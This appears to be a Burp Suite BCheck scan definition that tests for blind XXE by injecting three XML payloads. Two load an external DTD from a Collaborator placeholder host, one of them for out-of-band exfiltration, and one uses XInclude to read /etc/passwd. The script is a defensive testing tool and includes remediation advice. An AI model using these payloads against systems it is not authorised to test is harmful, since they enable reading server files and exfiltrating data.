metadata:
    language: v2-beta
    name: "XXE - Blind OOB Exfiltration"
    description: "Tests for blind XXE using out-of-band techniques with parameter entities"
    author: "BCheck Arsenal"
    tags: "xxe", "blind", "oob"

given insertion point then
    send payload:
        replacing: "{insertion_point}"
        following replacements:
            - "<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM \"http://COLLABORATOR/xxe\">%xxe;]><foo>test</foo>"
            - "<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY % dtd SYSTEM \"http://COLLABORATOR/evil.dtd\">%dtd;%send;]><foo>test</foo>"
            - "<foo xmlns:xi=\"http://www.w3.org/2001/XInclude\"><xi:include parse=\"text\" href=\"file:///etc/passwd\"/></foo>"

    if {check.response} matches "(ENTITY|DOCTYPE|XInclude|xi:include)" then
        report issue:
            severity: high
            confidence: tentative
            detail: "Potential blind XXE. Server processes XML with external entity declarations. Verify with Burp Collaborator."
            remediation: "Disable DTD processing entirely. Reject XML with DOCTYPE declarations."
    end if